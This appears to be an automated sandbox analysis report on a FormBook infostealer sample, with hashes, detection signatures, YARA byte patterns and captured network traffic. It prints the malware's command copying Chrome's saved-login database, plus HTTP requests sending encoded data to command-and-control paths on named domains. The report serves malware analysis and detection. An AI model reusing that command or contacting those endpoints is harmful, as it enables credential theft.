
Analysis Report xg28sL5JDm.exe

Overview

General Information

Sample Name: xg28sL5JDm.exe
MD5: 427c74cd09c5e3da8c9c9f3d5c1c126a
SHA1: 59583b1abf57a9d1d01de013d864ec3c75d68938
SHA256: e082a8136dd0aa48cfefb68b6afb0878004c250f50900efddba892fc23c68500

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected FormBook malware
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Contains functionality to detect sleep reduction / modifications
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious Svchost Process
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to resolve many domain names, but no domain seems valid
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query locales information (e.g. system language)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Domain name seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x15749:$sqlite3step: 68 34 1C 7B E1
    • 0x1585c:$sqlite3step: 68 34 1C 7B E1
    • 0x15778:$sqlite3text: 68 38 2A 90 C5
    • 0x1589d:$sqlite3text: 68 38 2A 90 C5
    • 0x1578b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x158b3:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x7248:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x74b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x12ae5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x125d1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x12be7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x12d5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x802a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1184c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x89c3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x17e37:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x18e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000002.1485946489.0000000002270000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000E.00000002.1485946489.0000000002270000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x15749:$sqlite3step: 68 34 1C 7B E1
    • 0x1585c:$sqlite3step: 68 34 1C 7B E1
    • 0x15778:$sqlite3text: 68 38 2A 90 C5
    • 0x1589d:$sqlite3text: 68 38 2A 90 C5
    • 0x1578b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x158b3:$sqlite3blob: 68 53 D8 7F 8C

Unpacked PEs

Source | Rule | Description | Author | Strings
3.2.xg28sL5JDm.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.2.xg28sL5JDm.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x14949:$sqlite3step: 68 34 1C 7B E1
    • 0x14a5c:$sqlite3step: 68 34 1C 7B E1
    • 0x14978:$sqlite3text: 68 38 2A 90 C5
    • 0x14a9d:$sqlite3text: 68 38 2A 90 C5
    • 0x1498b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x14ab3:$sqlite3blob: 68 53 D8 7F 8C
3.2.xg28sL5JDm.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x6448:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x66b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x11ce5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x117d1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x11de7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x11f5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x722a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x10a4c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x7bc3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x17037:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1803a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
15.1.sdv88p2lg.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
15.1.sdv88p2lg.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x15749:$sqlite3step: 68 34 1C 7B E1
    • 0x1585c:$sqlite3step: 68 34 1C 7B E1
    • 0x15778:$sqlite3text: 68 38 2A 90 C5
    • 0x1589d:$sqlite3text: 68 38 2A 90 C5
    • 0x1578b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x158b3:$sqlite3blob: 68 53 D8 7F 8C

Sigma Overview

System Summary:

Sigma detected: Steal Google chrome login data
Source: Process started | Author: Joe Security | Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\svchost.exe, ParentImage: C:\Windows\SysWOW64\svchost.exe, ParentProcessId: 5972, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 3252
Sigma detected: Suspicious Svchost Process
Source: Process started | Author: Florian Roth | Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2928, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 5972
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process started | Author: vburov | Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2928, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 5972

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: xg28sL5JDm.exe | Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Mm2kd\sdv88p2lg.exe | Avira: detection malicious, Label: HEUR/AGEN.1046743
Multi AV Scanner detection for domain / URL
Source: www.allixanes.com | Virustotal: Detection: 6%
Source: http://www.allixanes.com/ez3/ | Virustotal: Detection: 11%
Source: http://www.allixanes.com | Virustotal: Detection: 6%
Source: http://www.tylermercer.net/ez3/ | Virustotal: Detection: 7%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Mm2kd\sdv88p2lg.exe | Virustotal: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\Mm2kd\sdv88p2lg.exe | Metadefender: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\Mm2kd\sdv88p2lg.exe | ReversingLabs: Detection: 90%
Multi AV Scanner detection for submitted file
Source: xg28sL5JDm.exe | Virustotal: Detection: 81%
Source: xg28sL5JDm.exe | Metadefender: Detection: 28%
Source: xg28sL5JDm.exe | ReversingLabs: Detection: 90%
Yara detected FormBook
Source: Yara match | File source: 00000003.00000002.922461838.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1485946489.0000000002270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2479604719.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2481636727.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.922551051.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1506249884.0000000000A30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2481462321.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.1506020051.00000000007A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1487281055.0000000002600000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.865204916.0000000002200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000001.1483312311.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1503710394.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1503886889.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.923330823.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000001.862672381.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.865480989.00000000023E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 3.2.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.1.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.1.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.sdv88p2lg.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.1.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.xg28sL5JDm.exe.2200000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.sdv88p2lg.exe.2600000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.1.xg28sL5JDm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.xg28sL5JDm.exe.2200000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.sdv88p2lg.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.sdv88p2lg.exe.2270000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.sdv88p2lg.exe.2270000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.xg28sL5JDm.exe.23e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.xg28sL5JDm.exe.23e0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.xg28sL5JDm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.sdv88p2lg.exe.2600000.3.unpack, type: UNPACKEDPE
Source: 15.1.sdv88p2lg.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.xg28sL5JDm.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.1.xg28sL5JDm.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.xg28sL5JDm.exe.2200000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 15.2.sdv88p2lg.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 14.2.sdv88p2lg.exe.2270000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.svchost.exe.2d00000.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.xg28sL5JDm.exe.23e0000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 14.2.sdv88p2lg.exe.2600000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

Source: C:\Users\user\Desktop\xg28sL5JDm.exe | Code function: 0_2_004051BC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, | 0_2_004051BC

Source: C:\Users\user\Desktop\xg28sL5JDm.exe | Code function: 4x nop then mov ebx, 000014B9h | 0_2_00469CD0
Source: C:\Users\user\Desktop\xg28sL5JDm.exe | Code function: 4x nop then push 00000000h | 0_2_00469CD0
Source: C:\Users\user\Desktop\xg28sL5JDm.exe | Code function: 4x nop then mov eax, dword ptr [00475BF0h] | 0_2_00469CD0
Source: C:\Users\user\Desktop\xg28sL5JDm.exe | Code function: 4x nop then mov dl, byte ptr [eax+0046BF64h] | 0_2_00469CD0
Source: C:\Users\user\Desktop\xg28sL5JDm.exe | Code function: 4x nop then inc ebx | 0_2_00469CD0
Source: C:\Users\user\Desktop\xg28sL5JDm.exe | Code function: 4x nop then mov eax, dword ptr [esp] | 0_2_00469C6C
Source: C:\Users\user\Desktop\xg28sL5JDm.exe | Code function: 4x nop then pop edi | 3_2_0040BB4B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4x nop then pop edi | 5_2_0040BB4B
Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe | Code function: 4x nop then mov eax, dword ptr [esi+34h] | 14_2_022B4705
Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe | Code function: 4x nop then jmp 022B5F22h | 14_2_022B5766
Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe | Code function: 4x nop then add edx, 02h | 14_2_022B7243
Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe | Code function: 4x nop then mov dword ptr [ebp+10h], ebx | 14_2_022B3ED1
Source: C:\Program Files (x86)\Mm2kd\sdv88p2lg.exe | Code function: 4x nop then call dword ptr [edi+000000F4h] | 14_2_022B282D
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 4x nop then pop edi | 18_2_007ABB4B

Networking:

Tries to resolve many domain names, but no domain seems valid
Source: unknown | DNS traffic detected: query: www.tinbaofb.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.tatilultra.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.tqg6k4jl-0k8rlg.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.greenslandscapingllc.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.estereojerusalenfm.com replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.zqhanu.men replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.chestermerecalgaryhomes.info replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.oraning.net replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.hoops2life.net replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.vxstfh.men replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.jwc.bet replaycode: Name error (3)
Source: unknown | DNS traffic detected: query: www.djhong.net replaycode: Name error (3)
Source: Joe Sandbox View | Domain Name: www.allixanes.com www.allixanes.com
Source: global traffic | HTTP traffic detected: GET /ez3/?dL3=vCpm5ZZqrH7OiMY9wlvLz2zGlUJ+JVzXgj6JNNlAQvXoCTUNGwSPtSxHLDwbMk+jBbWB&f2JLp=0ZWpXH1 HTTP/1.1 | Host: www.pawlowski.life | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ez3/?dL3=oh/nSlzENG0qUOAwPXeIQOtwW6r8d6QREB9M6hBu+NM+9UHPsG9g+Ot2gFGRe3aStlqv&f2JLp=0ZWpXH1 HTTP/1.1 | Host: www.lcpierpontphotography.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ez3/?dL3=7CEQ+k742KWuCXQBHgFuLA7JV8UfVcRSEMIHryxdtZ0WgVQp3Q3kFEzSW7ScRDzGFE92&f2JLp=0ZWpXH1 HTTP/1.1 | Host: www.tylermercer.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ez3/?dL3=X3u3PzGnlM4B8cIThswW3+TZhgNWE0aZtyVvUn4Lv16SAoXv0FRCFRv3M3XIz91P9rzv&f2JLp=0ZWpXH1 HTTP/1.1 | Host: www.allixanes.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 198.185.159.144 198.185.159.144
Source: Joe Sandbox View | ASN Name: unknown unknown
          Source: global trafficHTTP traffic detected: POST /ez3/ HTTP/1.1Host: www.lcpierpontphotography.comConnection: closeContent-Length: 153125Cache-Control: no-cacheOrigin: http://www.lcpierpontphotography.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.lcpierpontphotography.com/ez3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 64 4c 33 3d 67 44 7a 64 4d 41 6d 55 4a 44 4e 43 4b 2d 73 32 4e 51 4f 57 43 49 52 6f 63 37 50 49 65 71 64 50 57 45 51 35 70 42 78 76 75 39 4d 5a 33 32 58 50 6a 6c 6c 35 75 61 51 6f 37 30 4b 56 59 55 61 47 34 55 54 37 36 58 37 66 44 55 58 32 7e 62 6e 63 79 61 61 49 45 4f 75 31 59 66 42 7a 35 61 77 6f 72 56 69 53 72 2d 35 7a 43 41 4c 70 4b 54 48 34 67 47 54 47 79 78 4e 39 47 43 6d 48 5a 68 6f 43 34 34 70 75 38 39 45 51 50 6d 42 7a 70 56 46 4c 72 49 6f 6c 55 5a 6e 4e 4a 44 56 4d 79 4c 56 59 74 46 42 75 47 7a 77 79 76 2d 45 45 58 57 34 51 59 66 38 56 33 7a 66 70 7a 6e 69 46 48 49 6f 71 62 4d 28 32 7e 4a 43 57 69 54 63 56 49 59 78 55 6b 67 73 53 31 71 6e 53 4e 5f 63 4b 43 4c 65 5a 5a 5f 39 6b 49 36 4f 41 59 75 72 39 67 58 6f 6c 46 78 61 5f 6f 6e 55 6c 4d 5a 53 6d 35 48 70 52 68 4d 54 41 28 39 76 59 52 4c 41 56 30 53 46 66 43 30 52 6e 4e 61 48 6c 42 53 7a 4f 7e 4c 4e 75 37 51 6c 7a 32 58 53 46 62 42 74 77 32 6d 65 44 6e 78 65 38 4c 52 67 37 7e 56 34 51 6a 4f 54 7a 59 4c 31 46 65 54 38 47 39 73 6f 30 45 73 70 76 39 41 6d 68 39 58 4b 43 4e 61 34 42 57 6b 55 74 56 77 4e 59 36 51 71 6f 38 37 72 56 31 6c 68 6d 72 34 38 32 57 37 33 5f 4c 51 70 5a 44 39 34 45 79 6a 72 69 51 31 48 5a 64 75 46 6d 59 44 48 76 42 34 48 59 66 52 43 59 77 62 7e 6c 72 34 7a 46 35 6d 69 74 6a 36 6a 6a 69 32 56 49 28 73 39 34 74 32 6f 45 6a 53 57 71 30 50 33 79 32 63 4d 59 58 33 48 61 51 61 5a 79 34 30 72 46 70 75 72 5a 71 6c 28 4f 4a 35 4e 5f 64 5a 47 6b 41 47 4d 32 30 77 4f 64 48 52 6e 6d 4a 4e 74 57 30 6c 66 74 71 31 6c 4b 65 45 65 74 4f 
77 53 76 34 38 52 79 4c 71 41 7a 52 65 73 64 55 56 73 50 73 75 72 76 50 61 4a 66 45 47 6e 37 53 73 59 39 41 4a 39 6e 35 46 6b 44 59 58 6b 32 7e 50 4f 57 6b 6c 6c 56 6b 57 28 4f 4d 4a 54 4d 48 69 43 34 76 6b 34 35 52 58 6b 65 41 53 54 69 72 5f 28 37 64 73 59 53 7a 5a 59 4c 52 49 44 32 65 48 68 6a 42 35 63 45 46 6e 55 45 66 46 4a 31 34 53 4b 64 36 36 71 42 7e 79 6b 75 37 77 58 33 70 2d 38 6c 31 74 43 4d 73 6e 66 58 6a 46 5a 67 7e 78 35 72 28 64 69 31 44 4a 4f 50 71 65 79 53 6c 33 39 47 6f 31 4f 74 65 64 59 51 6c 63 63 2d 34 5a 41 52 43 52 31 6d 58 4b 7e 48 34 70 64 65 69 43 6a 41 45 63 61 37 45 72 75 57 28 64 78 4e 72 37 34 47 52 69 70 37 55 4d 4b 5f 44 62 4f 33 6d 77 6a 36 68 67 65 6b 67 6d 44 77 35 77 65 74 6b 52 7a 66 36 4f 6c 73 52 79 79 70 74 4e 74 72 6e 5f 62 49 30 44 50 52 69 6d 4f 58 67 42 78 49 64 78 5a 6b 76 63 61 54 31 6c 79 70 68 4c 61 4f 75 4e 71 5f 56 49 77 46 28 4c 44 70 54 42 51 44 6a 33 6e 53 32 5a 41 49 43 31 43 62 6d 49 65 4e 4a 6f 72 6f 59 7a 57 55 6a 45 67 63 77 4e 51 53 72 70 4c 69 6b 6a 36 4e 6b 5
          Source: global trafficHTTP traffic detected: POST /ez3/ HTTP/1.1Host: www.tylermercer.netConnection: closeContent-Length: 153125Cache-Control: no-cacheOrigin: http://www.tylermercer.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tylermercer.net/ez3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 64 4c 33 3d 7a 67 49 71 67 45 4f 44 70 63 53 76 64 57 64 32 61 6e 6b 58 59 48 66 47 62 2d 6b 7a 53 59 46 34 42 6f 64 6b 36 69 56 47 68 4d 45 48 72 6e 4d 6f 34 77 36 4e 58 68 43 52 43 70 7a 41 64 44 37 30 59 6c 4a 36 30 32 30 32 51 55 38 5a 38 35 69 51 32 68 36 77 5a 6f 52 71 30 34 70 31 57 50 44 58 79 53 51 49 41 4b 53 7a 65 43 35 57 7a 6b 66 78 72 72 4c 48 64 31 65 35 44 68 6b 5f 35 58 55 47 28 4d 57 65 63 50 53 47 4b 43 64 49 57 6b 6a 66 6c 4b 54 48 4b 30 37 4e 34 42 49 6b 55 54 66 75 6a 43 6c 72 42 50 4e 67 66 73 77 6c 4c 57 4c 2d 62 30 6d 6a 55 47 66 64 50 59 41 41 51 45 35 48 67 32 46 63 78 77 28 54 61 6b 44 75 6f 65 6b 48 64 31 35 63 55 4e 47 79 53 4e 62 5f 46 5a 55 66 6b 6c 73 31 61 2d 51 6a 58 41 63 31 48 78 56 33 55 6c 49 48 70 38 49 74 6c 47 76 44 77 33 75 5a 44 4b 69 56 56 58 46 71 4e 6d 6c 38 6b 67 6e 77 77 4d 69 76 4f 53 34 4a 6a 56 4c 63 45 57 72 39 72 62 4e 41 47 5a 79 77 76 5a 49 63 76 65 42 31 59 58 50 74 43 51 43 71 43 73 65 52 37 58 6a 61 34 58 70 44 56 68 39 51 37 56 76 42 6c 38 79 73 31 70 47 55 32 70 38 34 7e 57 72 41 70 64 51 6b 6b 64 41 69 76 65 4e 5a 30 30 41 6c 4b 7a 77 37 5a 6a 45 53 52 79 31 5a 37 31 63 69 79 51 4c 4e 58 78 45 75 56 5a 6e 58 61 45 74 38 51 39 35 33 73 45 74 37 4f 48 32 4d 53 4a 44 34 4b 68 56 33 6d 66 37 35 68 78 48 56 48 6a 61 38 62 49 6e 56 39 4f 54 72 6d 72 71 75 47 6f 41 33 4a 46 38 2d 50 6b 76 67 75 6e 33 77 55 79 6b 67 78 36 63 69 63 6f 67 31 52 44 4d 30 49 4c 55 7a 36 64 4e 7a 58 4c 38 4f 6a 70 74 4c 72 48 4a 32 49 58 6c 46 46 63 74 35 6e 6d 4f 64 31 67 65 46 69 4e 41 36 63 61 62 
76 63 66 69 2d 42 2d 66 41 4a 68 4d 68 6c 32 6b 58 35 53 41 78 6a 5f 77 38 41 63 55 36 62 46 73 74 74 47 30 42 37 50 79 7a 71 33 70 47 36 4d 44 35 74 46 72 45 67 65 72 51 47 58 31 49 33 32 6b 41 51 49 67 6f 36 76 66 6e 42 4a 4e 46 59 78 58 44 74 34 6f 48 34 78 38 38 75 5f 48 71 43 6f 4e 79 28 76 30 6a 57 7a 74 45 47 7a 6a 35 74 6d 47 65 76 59 63 5a 4c 69 39 37 59 76 6d 38 4c 6a 35 74 73 5f 54 47 44 56 76 52 68 54 57 58 7a 63 77 68 30 57 52 6a 4e 31 4a 4f 38 5a 6a 52 28 70 53 63 6b 5f 49 5a 78 35 73 41 34 76 33 4a 36 51 56 44 35 65 65 54 63 64 64 42 59 55 6f 37 73 39 70 68 78 46 4e 55 47 33 46 34 63 48 68 54 6e 6b 48 6c 49 5f 66 69 6b 72 70 4f 36 47 52 7a 74 61 7a 35 28 7a 73 63 41 7a 61 65 31 47 4c 4b 63 43 73 6d 41 66 57 33 48 5f 51 48 74 37 64 4c 50 47 32 58 4b 52 74 55 4a 5a 39 47 6c 58 35 57 6c 54 5a 32 4c 41 46 42 47 56 47 48 69 38 45 6d 49 75 46 2d 66 70 61 4f 51 2d 4f 36 4c 55 61 6a 52 51 54 48 7e 48 57 68 4a 37 6e 43 4e 56 37 4a 61 63 51 39 42 6c 7a 53 6e 6e 4c 6f 49 31 78 5f 45 4a 6f 68 43 44 61 32 4b 53 78 5
          Source: global trafficHTTP traffic detected: POST /ez3/ HTTP/1.1Host: www.allixanes.comConnection: closeContent-Length: 153125Cache-Control: no-cacheOrigin: http://www.allixanes.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.allixanes.com/ez3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 64 4c 33 3d 66 56 69 4e 52 56 4f 73 32 59 42 32 6e 50 67 2d 72 4c 49 4d 70 4f 62 74 70 6a 6c 61 47 33 57 4e 30 45 42 70 50 52 4d 63 72 77 75 75 4b 70 48 33 7a 31 6b 30 43 45 36 76 66 55 75 4b 34 38 46 78 72 6f 53 72 49 44 70 53 77 6f 58 71 36 5f 6b 5a 69 69 73 44 4e 64 61 41 62 36 66 64 28 4d 4a 50 4a 55 70 57 64 2d 4e 54 54 41 4e 2d 30 64 38 69 6f 55 41 75 32 4e 77 58 57 34 47 67 7a 44 56 41 4a 49 57 49 6a 64 77 39 77 62 49 79 34 66 48 76 77 2d 28 41 41 77 79 75 73 33 54 69 37 35 65 46 58 5f 71 59 52 47 47 4f 55 73 6e 45 7a 62 30 53 38 62 69 52 31 4b 6b 2d 44 53 38 39 4a 49 6a 65 28 64 51 38 33 6d 70 50 49 37 58 70 68 63 54 38 64 69 33 64 4f 56 4f 38 44 56 57 46 6e 49 6a 33 57 63 71 46 72 33 36 47 32 58 64 72 4c 68 79 53 38 68 47 77 49 50 45 53 36 58 37 36 30 4c 52 48 6e 48 63 67 68 70 73 52 43 47 4e 6c 4b 38 75 5a 7e 45 72 4b 4d 7a 4d 57 67 35 4e 50 42 50 4b 53 78 52 6c 35 6e 4f 79 6e 45 76 50 58 64 58 42 47 43 6d 41 4d 53 55 7e 45 6c 69 75 51 4a 4a 64 53 7a 6c 68 4a 79 54 67 58 4e 4b 50 62 7e 51 75 4a 4a 58 62 5f 62 39 6f 66 75 46 6f 64 7a 54 76 41 46 74 44 44 79 42 34 41 64 4e 28 6e 54 46 33 55 4f 64 46 30 52 5a 34 75 74 